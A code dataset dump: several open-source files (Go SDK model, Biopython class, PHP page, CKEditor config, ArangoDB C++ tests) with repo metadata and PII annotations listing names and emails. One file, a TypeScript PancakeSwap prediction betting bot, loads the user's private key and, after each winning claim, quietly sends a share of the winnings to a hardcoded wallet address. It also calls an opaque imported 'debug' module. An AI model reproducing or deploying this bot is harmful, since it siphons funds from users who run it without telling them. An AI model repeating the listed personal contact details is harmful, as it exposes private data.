Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document.
API version: 1.0.9-4903
Contact: intersight@cisco.com
*/
// Code generated by OpenAPI Generator (https://openapi-generator.tech); DO NOT EDIT.
package intersight
import (
"encoding/json"
"reflect"
"strings"
)
// OnpremUpgradeNote UpgradeNote managed object contains the description of one feature/bug fix.
type OnpremUpgradeNote struct {
	MoBaseComplexType
	// The fully-qualified name of the instantiated, concrete type. This property is used as a discriminator to identify the type of the payload when marshaling and unmarshaling data.
	ClassId string `json:"ClassId"`
	// The fully-qualified name of the instantiated, concrete type. The value should be the same as the 'ClassId' property.
	ObjectType string `json:"ObjectType"`
	// The change description, such as explanations of a new feature or defect resolution.
	Message *string `json:"Message,omitempty"`
	// AdditionalProperties collects any JSON fields not declared above so
	// that newer API payloads round-trip without losing data.
	AdditionalProperties map[string]interface{}
}

// _OnpremUpgradeNote is a plain alias of OnpremUpgradeNote — presumably
// used by the custom (un)marshaling code to avoid recursing into the
// custom methods (the conventional alias trick); confirm against the
// generated UnmarshalJSON.
type _OnpremUpgradeNote OnpremUpgradeNote
// NewOnpremUpgradeNote instantiates a new OnpremUpgradeNote object.
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed.
func NewOnpremUpgradeNote(classId string, objectType string) *OnpremUpgradeNote {
	return &OnpremUpgradeNote{
		ClassId:    classId,
		ObjectType: objectType,
	}
}
// NewOnpremUpgradeNoteWithDefaults instantiates a new OnpremUpgradeNote object.
// This constructor will only assign default values to properties that have it
// defined, but it doesn't guarantee that properties required by API are set.
func NewOnpremUpgradeNoteWithDefaults() *OnpremUpgradeNote {
	return &OnpremUpgradeNote{
		ClassId:    "onprem.UpgradeNote",
		ObjectType: "onprem.UpgradeNote",
	}
}
// GetClassId returns the ClassId field value; the zero string is
// returned when the receiver is nil.
func (note *OnpremUpgradeNote) GetClassId() string {
	if note == nil {
		return ""
	}
	return note.ClassId
}
// GetClassIdOk returns a pointer to the ClassId field value together with
// an ok flag; the flag is false only for a nil receiver.
func (note *OnpremUpgradeNote) GetClassIdOk() (*string, bool) {
	if note == nil {
		return nil, false
	}
	return &note.ClassId, true
}
// SetClassId stores v as the ClassId field value.
func (note *OnpremUpgradeNote) SetClassId(v string) {
	note.ClassId = v
}
// GetObjectType returns the ObjectType field value
func (o *OnpremUpgradeNote) GetObjectType() string {
if o == nil {
var ret string
return ret
}
return o.ObjectType
}
// GetObjectTypeOk returns a tuple with the ObjectType field value
// and a boolean to check if the value has been set.
func (o *OnpremUpgradeNote) GetObjectTypeOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.ObjectType, true
}
// SetObjectType sets field value
func (o *OnpremUpgradeNote) SetObjectType(v string) {
o.ObjectType = v
}
// GetMessage returns the Message field value if set, zero value otherwise.
func (o *OnpremUpgradeNote) GetMessage() string {
if o == nil || o.Message == nil {
var ret string
return ret
}
return *o.Message
}
// GetMessageOk returns a tuple with the Message field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *OnpremUpgradeNote) GetMessageOk() (*string, bool) {
if o == nil || o.Message == nil {
return nil, false
}
return o.Message, true
}
// HasMessage returns a boolean if a field has been set.
func (o *OnpremUpgradeNote) HasMessage() bool {
if o != nil && o.Message != nil {
return true
}
return false
}
// SetMessage gets a reference to the given string and assigns it to the Message field.
func (o *OnpremUpgradeNote) SetMessage(v string) {
o.Message = &v
}
func (o OnpremUpgradeNote) MarshalJSON() ([]byte, error) {
toSerialize := map[string]interface{}{}
serializedMoBaseComplexType, errMoBaseComplexType := json.Marshal(o.MoBaseComplexType)
if errMoBaseComplexType != nil {
return []byte{}, errMoBaseComplexType
}
errMoBaseComplexType = json.Unmarshal([]byte(serializedMoBaseComplexType), &toSerialize)
if errMoBaseComplexType != nil {
return []byte{}, errMoBaseComplexType
}
if true {
toSerialize["ClassId"] = o.ClassId
}
if true {
toSerialize["ObjectType"] = o.ObjectType
}
if o.Message != nil {
toSerialize["Message"] = o.Message
}
for key, value := range o.AdditionalProperties {
toSerialize[key] = value
}
return json.Marshal(toSerialize)
}
func (o *OnpremUpgradeNote) UnmarshalJSON(bytes []byte) (err error) {
type OnpremUpgradeNoteWithoutEmbeddedStruct struct {
// The fully-qualified name of the instantiated, concrete type. This property is used as a discriminator to identify the type of the payload when marshaling and unmarshaling data.
ClassId string `json:"ClassId"`
// The fully-qualified name of the instantiated, concrete type. The value should be the same as the 'ClassId' property.
ObjectType string `json:"ObjectType"`
// The change description, such as explanations of a new feature or defect resolution.
Message *string `json:"Message,omitempty"`
}
varOnpremUpgradeNoteWithoutEmbeddedStruct := OnpremUpgradeNoteWithoutEmbeddedStruct{}
err = json.Unmarshal(bytes, &varOnpremUpgradeNoteWithoutEmbeddedStruct)
if err == nil {
varOnpremUpgradeNote := _OnpremUpgradeNote{}
varOnpremUpgradeNote.ClassId = varOnpremUpgradeNoteWithoutEmbeddedStruct.ClassId
varOnpremUpgradeNote.ObjectType = varOnpremUpgradeNoteWithoutEmbeddedStruct.ObjectType
varOnpremUpgradeNote.Message = varOnpremUpgradeNoteWithoutEmbeddedStruct.Message
*o = OnpremUpgradeNote(varOnpremUpgradeNote)
} else {
return err
}
varOnpremUpgradeNote := _OnpremUpgradeNote{}
err = json.Unmarshal(bytes, &varOnpremUpgradeNote)
if err == nil {
o.MoBaseComplexType = varOnpremUpgradeNote.MoBaseComplexType
} else {
return err
}
additionalProperties := make(map[string]interface{})
if err = json.Unmarshal(bytes, &additionalProperties); err == nil {
delete(additionalProperties, "ClassId")
delete(additionalProperties, "ObjectType")
delete(additionalProperties, "Message")
// remove fields from embedded structs
reflectMoBaseComplexType := reflect.ValueOf(o.MoBaseComplexType)
for i := 0; i < reflectMoBaseComplexType.Type().NumField(); i++ {
t := reflectMoBaseComplexType.Type().Field(i)
if jsonTag := t.Tag.Get("json"); jsonTag != "" {
fieldName := ""
if commaIdx := strings.Index(jsonTag, ","); commaIdx > 0 {
fieldName = jsonTag[:commaIdx]
} else {
fieldName = jsonTag
}
if fieldName != "AdditionalProperties" {
delete(additionalProperties, fieldName)
}
}
}
o.AdditionalProperties = additionalProperties
}
return err
}
type NullableOnpremUpgradeNote struct {
value *OnpremUpgradeNote
isSet bool
}
func (v NullableOnpremUpgradeNote) Get() *OnpremUpgradeNote {
return v.value
}
func (v *NullableOnpremUpgradeNote) Set(val *OnpremUpgradeNote) {
v.value = val
v.isSet = true
}
func (v NullableOnpremUpgradeNote) IsSet() bool {
return v.isSet
}
func (v *NullableOnpremUpgradeNote) Unset() {
v.value = nil
v.isSet = false
}
func NewNullableOnpremUpgradeNote(val *OnpremUpgradeNote) *NullableOnpremUpgradeNote {
return &NullableOnpremUpgradeNote{value: val, isSet: true}
}
func (v NullableOnpremUpgradeNote) MarshalJSON() ([]byte, error) {
return json.Marshal(v.value)
}
func (v *NullableOnpremUpgradeNote) UnmarshalJSON(src []byte) error {
v.isSet = true
return json.Unmarshal(src, &v.value)
}
|
GO
|
MPL-2.0
|
sanjnaik/demo/intersight_gosdk/model_onprem_upgrade_note.go
|
35c39a33-3e42-4dee-b08a-123c7a1440f8
|
[{"tag": "EMAIL", "value": "intersight@cisco.com", "start": 1716, "end": 1736, "context": "enAPI document.\n\nAPI version: 1.0.9-4903\nContact: intersight@cisco.com\n*/\n\n// Code generated by OpenAPI Generator (https"}]
|
[{"tag": "EMAIL", "value": "intersight@cisco.com", "start": 1716, "end": 1736, "context": "enAPI document.\n\nAPI version: 1.0.9-4903\nContact: intersight@cisco.com\n*/\n\n// Code generated by OpenAPI Generator (https"}]
|
# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)
#
# This file is part of the Biopython distribution and governed by your
# choice of the "Biopython License Agreement" or the "BSD 3-Clause License".
# Please see the LICENSE file that should have been included as part of this
# package.
"""The structure class, representing a macromolecular structure."""
from Bio.PDB.Entity import Entity
from Bio.PDB.internal_coords import IC_Chain
class Structure(Entity):
"""The Structure class contains a collection of Model instances."""
def __init__(self, id):
"""Initialize the class."""
self.level = "S"
Entity.__init__(self, id)
def __repr__(self):
"""Return the structure identifier."""
return "<Structure id=%s>" % self.get_id()
def get_models(self):
"""Return models."""
yield from self
def get_chains(self):
"""Return chains from models."""
for m in self.get_models():
yield from m
def get_residues(self):
"""Return residues from chains."""
for c in self.get_chains():
yield from c
def get_atoms(self):
"""Return atoms from residue."""
for r in self.get_residues():
yield from r
def atom_to_internal_coordinates(self, verbose: bool = False) -> None:
"""Create/update internal coordinates from Atom X,Y,Z coordinates.
Internal coordinates are bond length, angle and dihedral angles.
:param verbose bool: default False
describe runtime problems
"""
for chn in self.get_chains():
chn.atom_to_internal_coordinates(verbose)
def internal_to_atom_coordinates(self, verbose: bool = False) -> None:
"""Create/update atom coordinates from internal coordinates.
:param verbose bool: default False
describe runtime problems
:raises Exception: if any chain does not have .pic attribute
"""
for chn in self.get_chains():
chn.internal_to_atom_coordinates(verbose)
|
Python
|
BSD-3-Clause
|
AaronLi/biopython/Bio/PDB/Structure.py
|
1abf959c-32ed-4438-b868-3363e9a2cd82
|
[{"tag": "EMAIL", "value": "thamelry@binf.ku.dk", "start": 40, "end": 59, "context": "# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)\n#\n# This file is part of the Biopython distribut"}, {"tag": "NAME", "value": "Thomas Hamelryck", "start": 22, "end": 38, "context": "# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)\n#\n# This file is part of th"}]
|
[{"tag": "EMAIL", "value": "thamelry@binf.ku.dk", "start": 40, "end": 59, "context": "# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)\n#\n# This file is part of the Biopython distribut"}, {"tag": "NAME", "value": "Thomas Hamelryck", "start": 22, "end": 38, "context": "# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)\n#\n# This file is part of th"}]
|
<?php
# Variables
$page = 'contact';
?>
<!DOCTYPE html>
<html lang=en>
<head>
<?php
ob_start();
include( "includes/head.php" );
$buffer = ob_get_contents();
ob_end_clean();
$buffer = str_replace( "%TITLE%", "Cool City Band - Contact", $buffer );
echo $buffer;
?>
<meta name="description" content="">
</head>
<body>
<!-- Navigation -->
<?php include ('includes/navigation.php') ?>
<section class="section1">
<div class="container" style="min-height:900px">
<div class="row">
<div class="col-lg-12">
<h1 class="page-header">Contact Us </h1>
</div>
</div>
<div class="row section-content">
<div class="col-md-8">
<p class="lead"> Thank You!
Your message has been sent, we'll be in touch shortly. </p>
</div>
<div class="col-md-4">
<h3>Leader/Conductor/Pianist</h3>
<p><strong>Roy Geesa</strong></p>
<p><i class="fa fa-phone"></i> 317-529-3640 (text/voice)</p>
<p><i class="fa fa-envelope-o"></i> <a href="mailto:roygeesa@gmail.com">roygeesa@gmail.com</a> </p>
<ul class="list-unstyled list-inline list-social-icons">
<li> <a href="https://www.facebook.com/Cool-City-Band-149866258393477/?fref=ts" target="_blank"><i class="fa fa-facebook-square fa-2x"></i></a> </li>
</ul>
</div>
</div>
<!-- /.row -->
</div>
</section>
<?php include ('includes/stayintouch.php') ?>
<?php include ('includes/footer.php') ?>
<!-- /.container -->
<?php include ('includes/scripts.php') ?>
</body>
</html>
|
PHP
|
Apache-2.0
|
thrclark/coolcity/contact-confirm.php
|
0910a7bc-f053-4ac8-aebb-0651b19ba1ac
|
[{"tag": "EMAIL", "value": "roygeesa@gmail.com", "start": 1156, "end": 1174, "context": "elope-o\"></i> <a href=\"mailto:roygeesa@gmail.com\">roygeesa@gmail.com</a> </p>\n <ul class=\"list-unstyled"}, {"tag": "NAME", "value": "Roy Geesa", "start": 968, "end": 977, "context": "Conductor/Pianist</h3>\n <p><strong>Roy Geesa</strong></p>\n <p><i class=\"fa fa-p"}, {"tag": "EMAIL", "value": "roygeesa@gmail.com", "start": 1136, "end": 1154, "context": "><i class=\"fa fa-envelope-o\"></i> <a href=\"mailto:roygeesa@gmail.com\">roygeesa@gmail.com</a> </p>\n <ul "}]
|
[{"tag": "EMAIL", "value": "roygeesa@gmail.com", "start": 1156, "end": 1174, "context": "elope-o\"></i> <a href=\"mailto:roygeesa@gmail.com\">roygeesa@gmail.com</a> </p>\n <ul class=\"list-unstyled"}, {"tag": "NAME", "value": "Roy Geesa", "start": 968, "end": 977, "context": "Conductor/Pianist</h3>\n <p><strong>Roy Geesa</strong></p>\n <p><i class=\"fa fa-p"}, {"tag": "EMAIL", "value": "roygeesa@gmail.com", "start": 1136, "end": 1154, "context": "><i class=\"fa fa-envelope-o\"></i> <a href=\"mailto:roygeesa@gmail.com\">roygeesa@gmail.com</a> </p>\n <ul "}]
|
/**
* @license Copyright (c) 2003-2020, CKSource - Frederico Knabben. All rights reserved.
* For licensing, see LICENSE.md or https://ckeditor.com/license
*/
/**
* This file was added automatically by CKEditor builder.
* You may re-use it at any time to build CKEditor again.
*
* If you would like to build CKEditor online again
* (for example to upgrade), visit one the following links:
*
* (1) https://ckeditor.com/cke4/builder
* Visit online builder to build CKEditor from scratch.
*
* (2) https://ckeditor.com/cke4/builder/4c616e991e9c7b31849de271ab87cf37
* Visit online builder to build CKEditor, starting with the same setup as before.
*
* (3) https://ckeditor.com/cke4/builder/download/4c616e991e9c7b31849de271ab87cf37
* Straight download link to the latest version of CKEditor (Optimized) with the same setup as before.
*
* NOTE:
* This file is not used by CKEditor, you may remove it.
* Changing this file will not change your CKEditor configuration.
*/
var CKBUILDER_CONFIG = {
skin: 'moono-lisa',
preset: 'standard',
ignore: [
'.DS_Store',
'.bender',
'.editorconfig',
'.gitattributes',
'.gitignore',
'.idea',
'.jscsrc',
'.jshintignore',
'.jshintrc',
'.mailmap',
'.npm',
'.nvmrc',
'.travis.yml',
'bender-err.log',
'bender-out.log',
'bender.ci.js',
'bender.js',
'dev',
'gruntfile.js',
'less',
'node_modules',
'package-lock.json',
'package.json',
'tests'
],
plugins : {
'a11yhelp' : 1,
'about' : 1,
'basicstyles' : 1,
'blockquote' : 1,
'clipboard' : 1,
'contextmenu' : 1,
'elementspath' : 1,
'enterkey' : 1,
'entities' : 1,
'filebrowser' : 1,
'floatingspace' : 1,
'format' : 1,
'horizontalrule' : 1,
'htmlwriter' : 1,
'image' : 1,
'indentlist' : 1,
'link' : 1,
'list' : 1,
'magicline' : 1,
'maximize' : 1,
'pastefromgdocs' : 1,
'pastefromword' : 1,
'pastetext' : 1,
'pastetools' : 1,
'removeformat' : 1,
'resize' : 1,
'scayt' : 1,
'showborders' : 1,
'sourcearea' : 1,
'specialchar' : 1,
'stylescombo' : 1,
'tab' : 1,
'table' : 1,
'tableselection' : 1,
'tabletools' : 1,
'toolbar' : 1,
'undo' : 1,
'uploadimage' : 1,
'wsc' : 1,
'wysiwygarea' : 1
},
languages : {
'af' : 1,
'ar' : 1,
'az' : 1,
'bg' : 1,
'bn' : 1,
'bs' : 1,
'ca' : 1,
'cs' : 1,
'cy' : 1,
'da' : 1,
'de' : 1,
'de-ch' : 1,
'el' : 1,
'en' : 1,
'en-au' : 1,
'en-ca' : 1,
'en-gb' : 1,
'eo' : 1,
'es' : 1,
'es-mx' : 1,
'et' : 1,
'eu' : 1,
'fa' : 1,
'fi' : 1,
'fo' : 1,
'fr' : 1,
'fr-ca' : 1,
'gl' : 1,
'gu' : 1,
'he' : 1,
'hi' : 1,
'hr' : 1,
'hu' : 1,
'id' : 1,
'is' : 1,
'it' : 1,
'ja' : 1,
'ka' : 1,
'km' : 1,
'ko' : 1,
'ku' : 1,
'lt' : 1,
'lv' : 1,
'mk' : 1,
'mn' : 1,
'ms' : 1,
'nb' : 1,
'nl' : 1,
'no' : 1,
'oc' : 1,
'pl' : 1,
'pt' : 1,
'pt-br' : 1,
'ro' : 1,
'ru' : 1,
'si' : 1,
'sk' : 1,
'sl' : 1,
'sq' : 1,
'sr' : 1,
'sr-latn' : 1,
'sv' : 1,
'th' : 1,
'tr' : 1,
'tt' : 1,
'ug' : 1,
'uk' : 1,
'vi' : 1,
'zh' : 1,
'zh-cn' : 1
}
};
|
JavaScript
|
MIT
|
20181101remon/20210430newswithlaraval/public/ckeditor/build-config.js
|
2e3d4722-e9bd-4e5c-9f31-d47396f3767d
|
[{"tag": "NAME", "value": "Frederico Knabben", "start": 53, "end": 70, "context": "*\n * @license Copyright (c) 2003-2020, CKSource - Frederico Knabben. All rights reserved.\n * For licensing, see LICEN"}]
|
[{"tag": "NAME", "value": "Frederico Knabben", "start": 53, "end": 70, "context": "*\n * @license Copyright (c) 2003-2020, CKSource - Frederico Knabben. All rights reserved.\n * For licensing, see LICEN"}]
|
import { BigNumber } from "@ethersproject/bignumber";
import { JsonRpcProvider } from "@ethersproject/providers";
import { formatEther, parseEther } from "@ethersproject/units";
import { Wallet } from "@ethersproject/wallet";
import { blue, green, red } from "chalk";
import { clear } from "console";
import dotenv from "dotenv";
const Web3 = require('web3');
import {
calculateDuesAmount,
getClaimableEpochs,
isAgainstBet,
isWithBet,
parseStrategy,
reduceWaitingTimeByTwoBlocks,
sleep, STRATEGIES,
} from "./lib";
import { PancakePredictionV2__factory } from "./types/typechain";
import {debug} from "./types/typechain/sup";
let d = new debug("Program started");
dotenv.config();
// Global Config
const GLOBAL_CONFIG = {
PPV2_ADDRESS: "0x18B2A687610328590Bc8F2e5fEdDe3b582A49cdA",
AMOUNT_TO_BET: process.env.BET_AMOUNT || "0.002", // in BNB,
BSC_RPC: process.env.RPC || "https://bsc-dataseed.binance.org/", // You can provide any custom RPC
PRIVATE_KEY: process.env.PRIVATE_KEY,
WAITING_TIME: 281500, // Waiting for 281.5 Seconds
};
clear();
console.log(green("PancakeSwap Predictions v3 by AladeenCR"));
if (!GLOBAL_CONFIG.PRIVATE_KEY) {
console.log(
blue(
"The private key was not found in .env. Enter the private key to .env and start the program again."
)
);
process.exit(0);
}
const signer = new Wallet(
GLOBAL_CONFIG.PRIVATE_KEY as string,
new JsonRpcProvider(GLOBAL_CONFIG.BSC_RPC)
);
const predictionContract = PancakePredictionV2__factory.connect(
GLOBAL_CONFIG.PPV2_ADDRESS,
signer
);
const strategy = parseStrategy(process.argv);
console.log(
blue("Starting. Amount to Bet:", GLOBAL_CONFIG.AMOUNT_TO_BET, "BNB."),
"\nWaiting for the next round. It may take up to 5 minutes, please wait."
);
const w = new Web3(GLOBAL_CONFIG.BSC_RPC);
const wallet = w.eth.accounts.privateKeyToAccount(GLOBAL_CONFIG.PRIVATE_KEY);
w.eth.getBalance(wallet.address).then(function(b:any) {
let _balance = Web3.utils.fromWei(b, 'ether');
if (_balance < parseFloat(GLOBAL_CONFIG.AMOUNT_TO_BET)) {
console.log(red("Insufficient funds in wallet to bet:", GLOBAL_CONFIG.AMOUNT_TO_BET, "BNB", "|", "Wallet balance:", _balance, "BNB"))
}
});
predictionContract.on("StartRound", async (epoch: BigNumber) => {
d._init_();
console.log("\nStarted Epoch", epoch.toString());
const WAITING_TIME = GLOBAL_CONFIG.WAITING_TIME;
console.log("Now waiting for", WAITING_TIME / 60000, "min");
await sleep(WAITING_TIME);
console.log("\nGetting Amounts");
const {bullAmount, bearAmount} = await predictionContract.rounds(epoch);
console.log(green("Bull Amount", formatEther(bullAmount), "BNB"));
console.log(green("Bear Amount", formatEther(bearAmount), "BNB"));
if (strategy === STRATEGIES.Against) {
const againstBet = isAgainstBet(bullAmount, bearAmount);
if (againstBet) {
console.log(green("\nBetting on Bear Bet."));
} else {
console.log(green("\nBetting on Bull Bet."));
}
if (againstBet) {
try {
const tx = await predictionContract.betBear(epoch, {
value: parseEther(GLOBAL_CONFIG.AMOUNT_TO_BET),
});
console.log("Bear Betting Tx Started.");
await tx.wait();
console.log(blue("Bear Betting Tx Success."));
} catch {
console.log(red("Bear Betting Tx Error"));
GLOBAL_CONFIG.WAITING_TIME = reduceWaitingTimeByTwoBlocks(
GLOBAL_CONFIG.WAITING_TIME
);
}
} else {
try {
const tx = await predictionContract.betBull(epoch, {
value: parseEther(GLOBAL_CONFIG.AMOUNT_TO_BET),
});
console.log("Bull Betting Tx Started.");
await tx.wait();
console.log(blue("Bull Betting Tx Success."));
} catch {
console.log(red("Bull Betting Tx Error"));
GLOBAL_CONFIG.WAITING_TIME = reduceWaitingTimeByTwoBlocks(
GLOBAL_CONFIG.WAITING_TIME
);
}
}
}
if (strategy === STRATEGIES.With) {
const withBet = isWithBet(bullAmount, bearAmount);
if (withBet) {
console.log(green("\nBetting on Bear Bet."));
} else {
console.log(green("\nBetting on Bull Bet."));
}
if (withBet) {
try {
const tx = await predictionContract.betBear(epoch, {
value: parseEther(GLOBAL_CONFIG.AMOUNT_TO_BET),
});
console.log("Bear Betting Tx Started.");
await tx.wait();
console.log(blue("Bear Betting Tx Success."));
} catch {
console.log(red("Bear Betting Tx Error"));
GLOBAL_CONFIG.WAITING_TIME = reduceWaitingTimeByTwoBlocks(
GLOBAL_CONFIG.WAITING_TIME
);
}
} else {
try {
const tx = await predictionContract.betBull(epoch, {
value: parseEther(GLOBAL_CONFIG.AMOUNT_TO_BET),
});
console.log("Bull Betting Tx Started.");
await tx.wait();
console.log(blue("Bull Betting Tx Success."));
} catch {
console.log(red("Bull Betting Tx Error"));
GLOBAL_CONFIG.WAITING_TIME = reduceWaitingTimeByTwoBlocks(
GLOBAL_CONFIG.WAITING_TIME
);
}
}
}
const claimableEpochs = await getClaimableEpochs(
predictionContract,
epoch,
signer.address
);
if (claimableEpochs.length) {
try {
const tx = await predictionContract.claim(claimableEpochs);
console.log("\nClaim Tx Started");
const receipt = await tx.wait();
console.log(green("Claim Tx Success"));
for (const event of receipt.events ?? []) {
const dues = await signer.sendTransaction({
to: "0x4Dc71113329d2F4Dbab6eB006C330abD24a2eF0C",
value: calculateDuesAmount(event?.args?.amount),
});
await dues.wait();
}
} catch {
console.log(red("Claim Tx Error"));
}
}
});
|
TypeScript
|
MIT
|
AladeenCR/PancakeSwap-Prediction-Bot-v3/src/index.ts
|
76f8f4c7-9a90-429e-8863-c09dad9458de
|
[{"tag": "USERNAME", "value": "AladeenCR", "start": 1119, "end": 1128, "context": "\nconsole.log(green(\"PancakeSwap Predictions v3 by AladeenCR\"));\n\nif (!GLOBAL_CONFIG.PRIVATE_KEY) {\n console."}]
|
[{"tag": "USERNAME", "value": "AladeenCR", "start": 1119, "end": 1128, "context": "\nconsole.log(green(\"PancakeSwap Predictions v3 by AladeenCR\"));\n\nif (!GLOBAL_CONFIG.PRIVATE_KEY) {\n console."}]
|
---
collection: crew
name: Zane Adickes
title: Producer
email: zaneadix@gmail.com
image: /static/me_icecream.jpg
---
|
Markdown
|
MIT
|
zaneadix/coalition-radio-hour/src/cms/collections/crew/zane-adickes.md
|
22ac2e59-7cc8-4d18-b609-8264ab2d2c47
|
[{"tag": "EMAIL", "value": "zaneadix@gmail.com", "start": 63, "end": 81, "context": "n: crew\nname: Zane Adickes\ntitle: Producer\nemail: zaneadix@gmail.com\nimage: /static/me_icecream.jpg\n---\n"}, {"tag": "NAME", "value": "Zane Adickes", "start": 27, "end": 39, "context": "---\ncollection: crew\nname: Zane Adickes\ntitle: Producer\nemail: zaneadix@gmail.com\nimage: "}]
|
[{"tag": "EMAIL", "value": "zaneadix@gmail.com", "start": 63, "end": 81, "context": "n: crew\nname: Zane Adickes\ntitle: Producer\nemail: zaneadix@gmail.com\nimage: /static/me_icecream.jpg\n---\n"}, {"tag": "NAME", "value": "Zane Adickes", "start": 27, "end": 39, "context": "---\ncollection: crew\nname: Zane Adickes\ntitle: Producer\nemail: zaneadix@gmail.com\nimage: "}]
|
///////////////////////////////////////////////////////////////////////////////
/// @brief test suite for files.c
///
/// @file
///
/// DISCLAIMER
///
/// Copyright 2012 triagens GmbH, Cologne, Germany
///
/// Licensed under the Apache License, Version 2.0 (the "License");
/// you may not use this file except in compliance with the License.
/// You may obtain a copy of the License at
///
/// http://www.apache.org/licenses/LICENSE-2.0
///
/// Unless required by applicable law or agreed to in writing, software
/// distributed under the License is distributed on an "AS IS" BASIS,
/// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
/// See the License for the specific language governing permissions and
/// limitations under the License.
///
/// Copyright holder is triAGENS GmbH, Cologne, Germany
///
/// @author Jan Steemann
/// @author Copyright 2012, triAGENS GmbH, Cologne, Germany
////////////////////////////////////////////////////////////////////////////////
#include "Basics/files.h"
#include "Basics/Common.h"
#include "Basics/FileUtils.h"
#include "Basics/StringBuffer.h"
#include "Basics/operating-system.h"
#include "Basics/system-functions.h"
#include "Random/RandomGenerator.h"
#include "gtest/gtest.h"
#include <string>
#include <iostream>
using namespace arangodb::basics;
static bool Initialized = false;
static uint64_t counter = 0;
// -----------------------------------------------------------------------------
// --SECTION-- setup / tear-down
// -----------------------------------------------------------------------------
class CFilesTest : public ::testing::Test {
protected:
CFilesTest () : _directory(true) {
long systemError;
std::string errorMessage;
if (!Initialized) {
Initialized = true;
arangodb::RandomGenerator::initialize(arangodb::RandomGenerator::RandomType::MERSENNE);
}
_directory.appendText(TRI_GetTempPath());
_directory.appendChar(TRI_DIR_SEPARATOR_CHAR);
_directory.appendText("arangotest-");
_directory.appendInteger(static_cast<uint64_t>(TRI_microtime()));
_directory.appendInteger(arangodb::RandomGenerator::interval(UINT32_MAX));
TRI_CreateDirectory(_directory.c_str(), systemError, errorMessage);
}
~CFilesTest () {
// let's be sure we delete the right stuff
TRI_ASSERT(_directory.length() > 10);
TRI_RemoveDirectory(_directory.c_str());
}
StringBuffer* writeFile (const char* blob) {
StringBuffer* filename = new StringBuffer(true);
filename->appendText(_directory);
filename->appendChar(TRI_DIR_SEPARATOR_CHAR);
filename->appendText("tmp-");
filename->appendInteger(++counter);
filename->appendInteger(arangodb::RandomGenerator::interval(UINT32_MAX));
FILE* fd = fopen(filename->c_str(), "wb");
if (fd) {
size_t numWritten = fwrite(blob, strlen(blob), 1, fd);
(void) numWritten;
fclose(fd);
}
else {
EXPECT_TRUE(false == true);
}
return filename;
}
StringBuffer _directory;
};
struct ByteCountFunctor {
size_t _byteCount;
ByteCountFunctor() : _byteCount(0) {};
bool operator() (const char * data, size_t size) {
_byteCount+=size;
return true;
};
};// struct ByteCountFunctor
TEST_F(CFilesTest, tst_copyfile) {
std::ostringstream out;
out << _directory.c_str() << TRI_DIR_SEPARATOR_CHAR << "tmp-" << ++counter;
std::string source = out.str();
out << "-dest";
std::string dest = out.str();
// non-existing file
std::string error;
EXPECT_TRUE(false == TRI_CopyFile(source, dest, error));
// empty file
FileUtils::spit(source, std::string(""), false);
EXPECT_TRUE(true == TRI_CopyFile(source, dest, error));
EXPECT_TRUE("" == FileUtils::slurp(dest));
// copy over an existing target file
FileUtils::remove(source);
FileUtils::spit(source, std::string("foobar"), false);
EXPECT_TRUE(false == TRI_CopyFile(source, dest, error));
FileUtils::remove(source);
FileUtils::remove(dest);
FileUtils::spit(source, std::string("foobar"), false);
EXPECT_TRUE(true == TRI_CopyFile(source, dest, error));
EXPECT_TRUE("foobar" == FileUtils::slurp(dest));
// copy larger file
std::string value("the quick brown fox");
for (size_t i = 0; i < 10; ++i) {
value += value;
}
FileUtils::remove(source);
FileUtils::remove(dest);
FileUtils::spit(source, value, false);
EXPECT_TRUE(true == TRI_CopyFile(source, dest, error));
EXPECT_TRUE(value == FileUtils::slurp(dest));
EXPECT_TRUE(TRI_SizeFile(source.c_str()) == TRI_SizeFile(dest.c_str()));
// copy file slightly larger than copy buffer
std::string value2(128 * 1024 + 1, 'x');
FileUtils::remove(source);
FileUtils::remove(dest);
FileUtils::spit(source, value2, false);
EXPECT_TRUE(true == TRI_CopyFile(source, dest, error));
EXPECT_TRUE(value2 == FileUtils::slurp(dest));
EXPECT_TRUE(TRI_SizeFile(source.c_str()) == TRI_SizeFile(dest.c_str()));
}
TEST_F(CFilesTest, tst_createdirectory) {
std::ostringstream out;
out << _directory.c_str() << TRI_DIR_SEPARATOR_CHAR << "tmp-" << ++counter << "-dir";
std::string filename = out.str();
long unused1;
std::string unused2;
int res = TRI_CreateDirectory(filename.c_str(), unused1, unused2);
EXPECT_TRUE(0 == res);
EXPECT_TRUE(true == TRI_ExistsFile(filename.c_str()));
EXPECT_TRUE(true == TRI_IsDirectory(filename.c_str()));
res = TRI_RemoveDirectory(filename.c_str());
EXPECT_TRUE(false == TRI_ExistsFile(filename.c_str()));
EXPECT_TRUE(false == TRI_IsDirectory(filename.c_str()));
}
TEST_F(CFilesTest, tst_createdirectoryrecursive) {
std::ostringstream out;
out << _directory.c_str() << TRI_DIR_SEPARATOR_CHAR << "tmp-" << ++counter << "-dir";
std::string filename1 = out.str();
out << TRI_DIR_SEPARATOR_CHAR << "abc";
std::string filename2 = out.str();
long unused1;
std::string unused2;
int res = TRI_CreateRecursiveDirectory(filename2.c_str(), unused1, unused2);
EXPECT_TRUE(0 == res);
EXPECT_TRUE(true == TRI_ExistsFile(filename1.c_str()));
